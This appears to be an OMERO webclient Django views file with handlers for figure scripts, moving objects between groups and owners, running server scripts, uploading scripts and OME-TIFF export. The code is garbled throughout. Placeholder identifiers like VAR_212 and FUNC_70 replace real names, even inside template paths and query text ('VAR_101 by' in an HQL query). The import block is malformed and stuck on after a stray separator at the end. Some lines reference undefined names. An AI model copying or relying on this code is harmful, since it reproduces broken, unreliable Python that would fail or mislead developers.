        VAR_212 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
        VAR_212 = ",".join(VAR_212)
    if VAR_212 is None and VAR_213 is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )

    def FUNC_85(VAR_215, VAR_187):
        """Resolve comma-separated ids to loaded objects of type VAR_215;
        404 when none exist, otherwise switch to the first object's group."""
        VAR_323 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
        VAR_324 = {}
        for VAR_38 in VAR_5.getObjects(VAR_215, VAR_323):
            VAR_324[VAR_38.id] = VAR_38
        VAR_325 = [VAR_41 for VAR_41 in VAR_323 if VAR_41 in VAR_324.keys()]
        if len(VAR_325) == 0:
            raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
        else:
            VAR_335 = list(VAR_324.values())[0].getDetails().group.id.val
            VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_335)
        return VAR_325, VAR_324

    VAR_53 = {}
    if VAR_212 is not None:
        VAR_212, VAR_326 = FUNC_85("Image", VAR_212)
        VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_212])
        VAR_53["dtype"] = "Image"
    if VAR_213 is not None:
        VAR_213, VAR_327 = FUNC_85("Dataset", VAR_213)
        VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_213])
        VAR_53["dtype"] = "Dataset"
    if VAR_43 == "SplitView":
        VAR_328 = "/omero/figure_scripts/Split_View_Figure.py"
        VAR_54 = "webclient/VAR_203/split_view_figure.html"
        VAR_329 = []  # name/tags/datasets info for each selected image
        for VAR_432 in VAR_212:
            VAR_158 = {"id": VAR_432}
            VAR_370 = VAR_326[VAR_432]
            VAR_158["name"] = VAR_370.getName()
            VAR_164 = [
                VAR_180.getTextValue()
                for VAR_180 in VAR_370.listAnnotations()
                if VAR_180._obj.__class__ == omero.model.TagAnnotationI
            ]
            VAR_158["tags"] = VAR_164
            VAR_158["datasets"] = [VAR_362.getName() for VAR_362 in VAR_370.listParents()]
            VAR_329.append(VAR_158)
        VAR_142 = VAR_326[VAR_212[0]]
        VAR_53["imgDict"] = VAR_329
        VAR_53["image"] = VAR_142
        VAR_53["channels"] = VAR_142.getChannels()
    elif VAR_43 == "Thumbnail":
        VAR_328 = "/omero/figure_scripts/Thumbnail_Figure.py"
        VAR_54 = "webclient/VAR_203/thumbnail_figure.html"

        def FUNC_88(VAR_212):
            """Pair each image id with its tag annotations; also collect
            the distinct tags seen."""
            VAR_408 = VAR_5.getAnnotationLinks("Image", parent_ids=VAR_212)
            VAR_409 = {}  # image id -> [tags]
            VAR_410 = {}  # tag id -> tag (distinct)
            for VAR_432 in VAR_212:
                VAR_409[VAR_432] = []
            for VAR_344 in VAR_408:
                VAR_383 = VAR_344.getChild()
                if VAR_383._obj.__class__ == omero.model.TagAnnotationI:
                    VAR_410[VAR_383.id] = VAR_383
                    VAR_409[VAR_344.getParent().id].append(VAR_383)
            VAR_411 = []
            for VAR_432 in VAR_212:
                VAR_411.append({"id": VAR_432, "tags": VAR_409[VAR_432]})
            VAR_164 = []
            for tId, VAR_433 in VAR_410.items():
                VAR_164.append(VAR_433)
            return VAR_411, VAR_164

        VAR_371 = []  # one thumbnail set per dataset (or one for images)
        VAR_164 = []
        VAR_372 = "Thumbnail_Figure"
        if VAR_213 is not None:
            for VAR_362 in VAR_5.getObjects("Dataset", VAR_213):
                VAR_304 = [VAR_318.id for VAR_318 in VAR_362.listChildren()]
                VAR_411, VAR_412 = FUNC_88(VAR_304)
                VAR_371.append({"name": VAR_362.getName(), "imageTags": VAR_411})
                VAR_164.extend(VAR_412)
            VAR_372 = VAR_371[0]["name"]
        else:
            VAR_411, VAR_412 = FUNC_88(VAR_212)
            VAR_371.append({"name": "images", "imageTags": VAR_411})
            VAR_164.extend(VAR_412)
            VAR_413 = VAR_5.getObject("Image", VAR_212[0]).getParent()
            VAR_372 = VAR_413.getName() or "Thumbnail Figure"
            VAR_53["parent_id"] = VAR_413.getId()
        VAR_373 = set()  # remove duplicates
        VAR_374 = []
        for VAR_433 in VAR_164:
            if VAR_433.id not in VAR_373:
                VAR_374.append(VAR_433)
                VAR_373.add(VAR_433.id)
        # BUG FIX: list.sort() takes the `key` keyword; the previous call
        # used an invalid keyword name and raised TypeError.
        VAR_374.sort(key=lambda x: x.getTextValue().lower())
        VAR_53["thumbSets"] = VAR_371
        VAR_53["tags"] = VAR_374
        VAR_53["figureName"] = VAR_372.replace(" ", "_")
    elif VAR_43 == "MakeMovie":
        VAR_328 = "/omero/export_scripts/Make_Movie.py"
        VAR_54 = "webclient/VAR_203/make_movie.html"
        VAR_142 = VAR_5.getObject("Image", VAR_212[0])
        VAR_414 = VAR_142.getName().rsplit(".", 1)
        if len(VAR_414) > 1 and len(VAR_414[1]) > 3:
            # "Extension" longer than 3 chars: probably not one — keep it.
            VAR_414 = ".".join(VAR_414)
        else:
            # BUG FIX: previously read an undefined name here; use the
            # stem from the rsplit above.
            VAR_414 = VAR_414[0]
        VAR_53["movieName"] = os.path.basename(VAR_414)
        VAR_282 = []
        for VAR_383 in VAR_142.getChannels():
            VAR_282.append(
                {
                    "active": VAR_383.isActive(),
                    "color": VAR_383.getColor().getHtml(),
                    "label": VAR_383.getLabel(),
                }
            )
        VAR_53["channels"] = VAR_282
        VAR_53["sizeT"] = VAR_142.getSizeT()
        VAR_53["sizeZ"] = VAR_142.getSizeZ()
    VAR_202 = VAR_5.getScriptService()
    VAR_42 = VAR_202.getScriptID(VAR_328)
    if VAR_42 < 0:
        raise AttributeError("No script found for VAR_314 '%s'" % VAR_328)
    VAR_53["template"] = VAR_54
    VAR_53["scriptId"] = VAR_42
    return VAR_53
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_27, VAR_5=None, **VAR_6):
    """List filesets that would be split by applying the given action to
    only some of their images, for the confirmation dialog."""
    VAR_216 = {}
    for VAR_215 in ("Image", "Dataset", "Project"):
        VAR_187 = VAR_2.GET.get(VAR_215, None)
        if VAR_187 is None:
            continue
        VAR_216[VAR_215] = [int(VAR_318) for VAR_318 in VAR_187.split(",")]
    VAR_217 = VAR_5.getContainerService().getImagesBySplitFilesets(
        VAR_216, None, VAR_5.SERVICE_OPTS
    )
    VAR_218 = [
        {
            "id": fsId,
            "attempted_iids": splitIds[True],
            "blocking_iids": splitIds[False],
        }
        for fsId, splitIds in VAR_217.items()
    ]
    # "chgrp" is presented to the user as "move".
    return {
        "split_filesets": VAR_218,
        "action": "move" if VAR_27 == "chgrp" else VAR_27,
        "template": "webclient/FUNC_62/fileset_check_dialog_content.html",
    }
def FUNC_70(
    VAR_5, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
    """Work out which tree nodes to update after objects are removed.

    Expands the given project/dataset/image/screen/plate id collections
    downwards (datasets of projects, plates of screens, images of datasets
    and plates, plus sibling images sharing a multi-image fileset), then
    determines which datasets/projects would be left childless.

    Returns a dict with "remove" (expanded id lists per type) and
    "childless" (projects/datasets emptied, plus an "orphaned" flag).
    NOTE(review): VAR_11 (last parameter) is unused in this body.
    """
    VAR_73 = omero.sys.ParametersI()
    VAR_74 = VAR_5.getQueryService()
    VAR_44 = set(VAR_44)
    VAR_45 = set(VAR_45)
    VAR_46 = set(VAR_46)
    VAR_219 = set([])  # fileset ids of images found under datasets
    VAR_48 = set(VAR_48)
    VAR_47 = set(VAR_47)
    if VAR_44:
        # Datasets contained in the given projects.
        VAR_73.map = {}
        VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
        VAR_75 = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
            VAR_45.add(e[0].val)
    if VAR_47:
        # Plates contained in the given screens.
        VAR_73.map = {}
        VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
        VAR_75 = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
            VAR_48.add(e[0].val)
    if VAR_45:
        # Images (and their fileset ids) contained in the given datasets.
        VAR_73.map = {}
        VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
        VAR_75 = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
            VAR_46.add(e[0].val)
            if e[1] is not None:
                VAR_219.add(e[1].val)
    if VAR_48:
        # Images in the well samples of the given plates.
        VAR_73.map = {}
        VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
        VAR_75 = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    if VAR_219:
        # All images of multi-image filesets touched above — deleting one
        # image of a fileset affects its siblings too.
        VAR_73.map = {}
        VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
        VAR_75 = """
select VAR_142.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.fileset.id in (select VAR_365.id
from Image im
join im.fileset VAR_365
where VAR_365.id in (:fsids)
VAR_101 by VAR_365.id
having count(im.id)>1)
"""
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    VAR_220 = set([])  # datasets left with no children
    VAR_221 = False  # any removed image had no dataset (orphaned)
    if VAR_46:
        VAR_73.map = {
            "iids": rlist([rlong(x) for x in VAR_46]),
        }
        VAR_330 = ""
        if VAR_45:
            # Exclude datasets that are themselves being removed.
            VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
            VAR_330 = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
        VAR_75 = (
            """
select distinct dilink.parent.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.id in (:VAR_153)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:VAR_153)) = 0
"""
            % VAR_330
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
            if e:
                VAR_220.add(e[0].val)
            else:
                VAR_221 = True
    VAR_222 = set([])  # projects left with no children
    if VAR_45:
        VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
        VAR_331 = ""
        if VAR_44:
            # Exclude projects that are themselves being removed.
            VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
            VAR_331 = "and pdlink.parent.id not in (:pids)"
        VAR_75 = (
            """
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
            % VAR_331
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_5.SERVICE_OPTS):
            VAR_222.add(e[0].val)
    VAR_223 = {
        "remove": {
            "project": list(VAR_44),
            "dataset": list(VAR_45),
            "screen": list(VAR_47),
            "plate": list(VAR_48),
            "image": list(VAR_46),
        },
        "childless": {
            "project": list(VAR_222),
            "dataset": list(VAR_220),
            "orphaned": VAR_221,
        },
    }
    return VAR_223
@require_POST
@login_required()
def FUNC_71(VAR_2, VAR_5=None, **VAR_6):
    """Dry-run a chgrp request by delegating to FUNC_72.

    BUG FIX: the connection was previously forwarded via an undefined name,
    raising NameError; pass the decorator-supplied connection VAR_5 through.
    """
    return FUNC_72(VAR_2, VAR_27="chgrp", VAR_5=VAR_5, **VAR_6)
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_27, VAR_5=None, **VAR_6):
    """Submit a dry-run of a chgrp/chown over the POSTed object ids and
    return the job handle as the response body."""
    VAR_224 = {}
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_224[VAR_215] = VAR_144
    # BUG FIX: VAR_332 was unbound for any action other than chgrp/chown,
    # raising UnboundLocalError below; default it explicitly.
    VAR_332 = None
    if VAR_27 == "chgrp":
        VAR_332 = getIntOrDefault(VAR_2, "group_id", None)
    elif VAR_27 == "chown":
        VAR_332 = getIntOrDefault(VAR_2, "owner_id", None)
    VAR_84 = VAR_5.submitDryRun(VAR_27, VAR_224, VAR_332)
    VAR_198 = VAR_345(VAR_84)
    return HttpResponse(VAR_198)
@login_required()
def FUNC_73(VAR_2, VAR_5=None, **VAR_6):
    """Move the POSTed objects into the group given by ``group_id`` (chgrp).

    Optionally creates (or reuses) a target container in the destination
    group, records a job-callback entry per object type in the session,
    and returns JSON describing which tree nodes need refreshing.
    """
    if not VAR_2.method == "POST":
        # BUG FIX: JsonResponse takes the `status` keyword; the previous
        # call used an invalid keyword name and raised TypeError.
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
    VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
    if VAR_20 is None:
        return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
    VAR_20 = VAR_241(VAR_20)

    def FUNC_86(VAR_71):
        """Owner id of the first POSTed Dataset/Image/Plate found."""
        for VAR_433 in ["Dataset", "Image", "Plate"]:
            VAR_187 = VAR_71.POST.get(VAR_433, None)
            if VAR_187 is not None:
                for o in list(VAR_5.getObjects(VAR_433, VAR_187.split(","))):
                    return o.getDetails().owner.id.val

    VAR_101 = VAR_5.getObject("ExperimenterGroup", VAR_20)
    VAR_226 = VAR_2.POST.get("new_container_name", None)
    VAR_227 = VAR_2.POST.get("new_container_type", None)
    VAR_228 = None
    VAR_229 = FUNC_86(VAR_2)
    # Act on behalf of the objects' owner so new containers belong to them.
    VAR_5.SERVICE_OPTS.setOmeroUser(VAR_229)
    if (
        VAR_226 is not None
        and len(VAR_226) > 0
        and VAR_227 is not None
    ):
        VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_20)
        VAR_228 = VAR_5.createContainer(VAR_227, VAR_226)
    if VAR_228 is None:
        VAR_332 = VAR_2.POST.get("target_id", None)
        VAR_228 = VAR_332 is not None and VAR_332.split("-")[1] or None
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_305 = VAR_2.POST.getlist("fileset")
            if len(VAR_305) > 0:
                if VAR_215 == "Dataset":
                    # BUG FIX: the fileset-id argument was previously an
                    # undefined name; pass the POSTed fileset ids.
                    VAR_5.regroupFilesets(dsIds=VAR_144, VAR_305=VAR_305)
                else:
                    # Include every sibling image of the selected filesets.
                    for VAR_365 in VAR_5.getObjects("Fileset", VAR_305):
                        VAR_144.extend([VAR_318.id for VAR_318 in VAR_365.copyImages()])
                    VAR_144 = list(set(VAR_144))  # remove duplicates
            VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
            VAR_84 = VAR_5.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
            VAR_198 = VAR_345(VAR_84)
            VAR_2.session["callback"][VAR_198] = {
                "job_type": "chgrp",
                "group": VAR_101.getName(),
                "to_group_id": VAR_20,
                "dtype": VAR_215,
                "obj_ids": VAR_144,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            VAR_2.session.modified = True
    VAR_44 = VAR_2.POST.get("Project", [])
    VAR_45 = VAR_2.POST.get("Dataset", [])
    VAR_46 = VAR_2.POST.get("Image", [])
    VAR_47 = VAR_2.POST.get("Screen", [])
    VAR_48 = VAR_2.POST.get("Plate", [])
    # BUG FIX: the parsed id lists were previously assigned to names that
    # were never read, so the raw comma-separated strings were handed to
    # FUNC_70 (which would iterate their characters); parse in place.
    if VAR_44:
        VAR_44 = [VAR_241(x) for x in VAR_44.split(",")]
    if VAR_45:
        VAR_45 = [VAR_241(x) for x in VAR_45.split(",")]
    if VAR_46:
        VAR_46 = [VAR_241(x) for x in VAR_46.split(",")]
    if VAR_47:
        VAR_47 = [VAR_241(x) for x in VAR_47.split(",")]
    if VAR_48:
        VAR_48 = [VAR_241(x) for x in VAR_48.split(",")]
    VAR_230 = FUNC_70(
        VAR_5,
        VAR_44,
        VAR_45,
        VAR_46,
        VAR_47,
        VAR_48,
        VAR_2.session.get("user_id"),
    )
    return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_74(VAR_2, VAR_5=None, **VAR_6):
    """Transfer ownership (chown) of the POSTed objects to ``owner_id``,
    recording one job-callback entry per object type; returns the job ids."""
    if not VAR_2.method == "POST":
        # BUG FIX: JsonResponse takes the `status` keyword; the previous
        # call used an invalid keyword name and raised TypeError.
        return JsonResponse({"Error": "Need to POST to chown"}, status=405)
    VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
    if VAR_231 is None:
        return JsonResponse({"Error": "chown: No VAR_231 specified"})
    VAR_231 = int(VAR_231)
    VAR_232 = VAR_5.getObject("Experimenter", VAR_231)
    if VAR_232 is None:
        # BUG FIX: the message used "%" with no placeholder, which raises
        # TypeError; include the id explicitly.
        return JsonResponse({"Error": "chown: Experimenter not found: %s" % VAR_231})
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
    VAR_233 = []
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
            VAR_84 = VAR_5.chownObjects(VAR_215, VAR_144, VAR_231)
            VAR_198 = VAR_345(VAR_84)
            VAR_233.append(VAR_198)
            VAR_2.session["callback"][VAR_198] = {
                "job_type": "chown",
                "owner": VAR_232.getFullName(),
                "to_owner_id": VAR_231,
                "dtype": VAR_215,
                "obj_ids": VAR_144,
                "job_name": "Change owner",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            VAR_2.session.modified = True
    return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_75(VAR_2, VAR_42, VAR_5=None, **VAR_6):
    """Run server-side script VAR_42, marshalling POSTed form values into
    the script's declared rtypes, then launch it via FUNC_78 and return
    the job info as JSON."""
    VAR_202 = VAR_5.getScriptService()
    VAR_50 = {}  # the input map handed to the script
    VAR_49 = VAR_241(VAR_42)
    try:
        VAR_73 = VAR_202.getParams(VAR_49)
    except Exception as x:
        # NOTE(review): Exception.message is Python-2-only; on Python 3
        # this raises AttributeError instead of the intended check.
        if x.message and x.message.startswith("No processor available"):
            # Run anyway (with no params) so FUNC_78 records the failure.
            VAR_174 = FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43="Script")
            return JsonResponse(VAR_174)
        else:
            raise
    VAR_73 = VAR_202.getParams(VAR_49)
    VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
    VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
    # Optional uploaded file becomes a FileAnnotation passed to the script.
    VAR_234 = (
        "file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
    )
    VAR_235 = None
    if VAR_234 is not None and VAR_234 != "":
        VAR_104 = BaseContainer(VAR_5)
        VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
    for VAR_310, VAR_320 in VAR_73.inputs.items():
        VAR_333 = VAR_320.prototype
        VAR_334 = VAR_333.__class__  # rtype wrapper class for this input
        if VAR_310 == "File_Annotation" and VAR_235 is not None:
            VAR_50[VAR_310] = VAR_334(VAR_345(VAR_235))
            continue
        if VAR_334 == omero.rtypes.RBoolI:
            # Checkbox: present in POST means True.
            VAR_375 = VAR_310 in VAR_2.POST
            VAR_50[VAR_310] = VAR_334(VAR_375)
            continue
        if VAR_334.__name__ == "RMapI":
            # Map inputs arrive as <name>_key0/<name>_value0, _key1/... pairs.
            VAR_376 = "%s_key0" % VAR_310
            VAR_377 = "%s_value0" % VAR_310
            VAR_378 = 0
            VAR_379 = {}
            while VAR_376 in VAR_2.POST:
                VAR_415 = VAR_345(VAR_2.POST[VAR_376])
                VAR_416 = VAR_2.POST[VAR_377]
                if len(VAR_415) > 0 and len(VAR_416) > 0:
                    VAR_379[VAR_345(VAR_415)] = VAR_416
                VAR_378 += 1
                VAR_376 = "%s_key%d" % (VAR_310, VAR_378)
                VAR_377 = "%s_value%d" % (VAR_310, VAR_378)
            if len(VAR_379) > 0:
                VAR_50[VAR_310] = wrap(VAR_379)
            continue
        if VAR_310 in VAR_2.POST:
            if VAR_334 == omero.rtypes.RListI:
                VAR_417 = VAR_2.POST.getlist(VAR_310)
                if len(VAR_417) == 0:
                    continue
                if len(VAR_417) == 1:  # process comma-separated list
                    if len(VAR_417[0]) == 0:
                        continue
                    # NOTE(review): `values` is undefined here — presumably
                    # VAR_417[0].split(",") was intended; as written this
                    # line raises NameError. Confirm and fix.
                    VAR_417 = values[0].split(",")
                # Element type inferred from the prototype's first element,
                # defaulting to rstring.
                VAR_418 = omero.rtypes.RStringI
                VAR_419 = VAR_333.val  # list
                if len(VAR_419) > 0:
                    VAR_418 = VAR_419[0].__class__
                if VAR_418 == int(1).__class__:
                    VAR_418 = omero.rtypes.rint
                if VAR_418 == VAR_241(1).__class__:
                    VAR_418 = omero.rtypes.rlong
                VAR_420 = []
                for VAR_416 in VAR_417:
                    try:
                        VAR_38 = VAR_418(VAR_416.strip())
                    except Exception:
                        VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_416))
                        continue
                    if isinstance(VAR_38, omero.model.IObject):
                        VAR_420.append(omero.rtypes.robject(VAR_38))
                    else:
                        VAR_420.append(VAR_38)
                VAR_50[VAR_310] = omero.rtypes.rlist(VAR_420)
            else:
                # Scalar input: wrap in the prototype's rtype class.
                VAR_375 = VAR_2.POST[VAR_310]
                if len(VAR_375) == 0:
                    continue
                try:
                    VAR_50[VAR_310] = VAR_334(VAR_375)
                except Exception:
                    VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_310, VAR_375))
                    continue
    # Run the script in the group of the first target object.
    if "IDs" in VAR_50 and "Data_Type" in VAR_50:
        VAR_335 = VAR_5.SERVICE_OPTS.getOmeroGroup()
        VAR_5.SERVICE_OPTS.setOmeroGroup("-1")
        try:
            VAR_380 = VAR_5.getObject(
                VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
            )
            VAR_381 = VAR_380.getDetails().group.id.val
            VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_381)
        except Exception:
            VAR_0.debug(traceback.format_exc())
            # Fall back to the original group context.
            VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_335)
    try:
        VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
    except Exception:
        pass
    VAR_174 = FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43)
    return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_76(VAR_2, VAR_5=None, **VAR_6):
    """Upload a new official script, or replace it if the path already
    exists; GET just renders the upload form."""
    if VAR_2.method != "POST":
        return {"template": "webclient/VAR_203/upload_script.html"}
    VAR_236 = VAR_2.POST.get("script_path")
    VAR_237 = VAR_2.FILES["script_file"]
    VAR_237.seek(0)
    VAR_238 = VAR_237.read().decode("utf-8")
    # BUG FIX: the path was previously rebuilt from an undefined name,
    # raising NameError; build it from the POSTed folder plus file name.
    if not VAR_236.endswith("/"):
        VAR_236 = VAR_236 + "/"
    VAR_236 = VAR_236 + VAR_237.name
    VAR_202 = VAR_5.getScriptService()
    VAR_239 = VAR_202.getScriptID(VAR_236)
    try:
        if VAR_239 > 0:
            # Existing script at this path: replace its contents.
            VAR_173 = OriginalFileI(VAR_239, False)
            VAR_202.editScript(VAR_173, VAR_238)
            VAR_382 = "Script Replaced: %s" % VAR_237.name
        else:
            VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
            VAR_382 = "Script Uploaded: %s" % VAR_237.name
    except omero.ValidationException as ex:
        VAR_382 = VAR_345(ex)
    return {"Message": VAR_382, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_77(VAR_2, VAR_26, VAR_5=None, **VAR_6):
    """Launch the Batch_Image_Export script to build an OME-TIFF for one
    image and return the job info as JSON."""
    VAR_202 = VAR_5.getScriptService()
    VAR_49 = VAR_202.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
    VAR_142 = VAR_5.getObject("Image", VAR_26)
    if VAR_142 is not None:
        # Run in the image's own group.
        VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_142.getDetails().group.id.val)
    VAR_212 = [VAR_241(VAR_26)]
    VAR_50 = {
        "Data_Type": wrap("Image"),
        "IDs": rlist([rlong(id) for id in VAR_212]),
        "Format": wrap("OME-TIFF"),
    }
    return JsonResponse(
        FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43="Create OME-TIFF")
    )
def FUNC_78(VAR_2, VAR_5, VAR_49, VAR_50, VAR_43="Script"):
    """Run script VAR_49 with inputs VAR_50 and record a job-callback entry
    in the session.

    Returns ``{"jobId", "status"}`` on success or ``{"status", "error"}``
    on failure; a missing processor is reported as its own status.
    """
    VAR_2.session.modified = True
    VAR_202 = VAR_5.getScriptService()
    try:
        VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_5.SERVICE_OPTS)
        VAR_198 = VAR_345(VAR_84)
        VAR_313 = "in progress"
        VAR_2.session["callback"][VAR_198] = {
            "job_type": "script",
            "job_name": VAR_43,
            "start_time": datetime.datetime.now(),
            "status": VAR_313,
        }
        VAR_2.session.modified = True
    except Exception as x:
        VAR_198 = VAR_345(time())  # E.g. 1312803670.6076391
        # Portable message extraction (Exception.message is gone in Py3).
        VAR_382 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if VAR_382 and VAR_382.startswith("No processor available"):
            VAR_0.info(traceback.format_exc())
            VAR_57 = "No Processor Available"
            VAR_313 = "no processor available"
            VAR_382 = ""  # template displays the Message and error fields
        else:
            VAR_0.error(traceback.format_exc())
            VAR_57 = traceback.format_exc()
            VAR_313 = "failed"
            # BUG FIX: this branch previously re-read x.message, which
            # raises AttributeError on Python 3; keep the message that was
            # safely extracted above.
        VAR_2.session["callback"][VAR_198] = {
            "job_type": "script",
            "job_name": VAR_43,
            "start_time": datetime.datetime.now(),
            "status": VAR_313,
            "Message": VAR_382,
            "error": VAR_57,
        }
        return {"status": VAR_313, "error": VAR_57}
    return {"jobId": VAR_198, "status": VAR_313}
@login_required()
@render_response()
def FUNC_79(VAR_2, VAR_26, VAR_5=None, **VAR_6):
    """Describe the most recent OME-TIFF export annotation on an image.

    Returns a dict with creation time, a human-readable age, the file
    annotation id and its download URL — or an empty dict when the image
    has no OME-TIFF annotation.
    """
    VAR_240 = list(
        VAR_5.getAnnotationLinks(
            "Image", [VAR_26], VAR_90=omero.constants.namespaces.NSOMETIFF
        )
    )
    VAR_172 = {}
    if len(VAR_240) > 0:
        # Newest link first.
        # BUG FIX: list.sort() takes `key`/`reverse` keywords; the previous
        # call used invalid keyword names and raised TypeError.
        VAR_240.sort(key=lambda x: x.getId(), reverse=True)
        VAR_336 = VAR_240[0]
        VAR_293 = VAR_336.creationEventDate()
        VAR_34 = VAR_336.getChild().getId()
        from omeroweb.webgateway.templatetags.common_filters import ago

        VAR_31 = VAR_350("download_annotation", args=[VAR_34])
        VAR_172 = {
            "created": VAR_345(VAR_293),
            "ago": ago(VAR_293),
            "id": VAR_34,
            "download": VAR_31,
        }
    return VAR_172  # will FUNC_80 returned as json by VAR_4
|
import .copy
import os
import .datetime
import Ice
from Ice import Exception as IceException
import logging
import .traceback
import json
import .re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import .is_safe_url
from time import .time
from omeroweb.version import .omeroweb_buildyear as build_year
from omeroweb.version import .omeroweb_version as omero_version
import .omero
import .omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import .toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import .urlencode
from django.core.urlresolvers import .reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import .never_cache
from django.views.decorators.http import .require_POST
from django.shortcuts import .render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import .views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
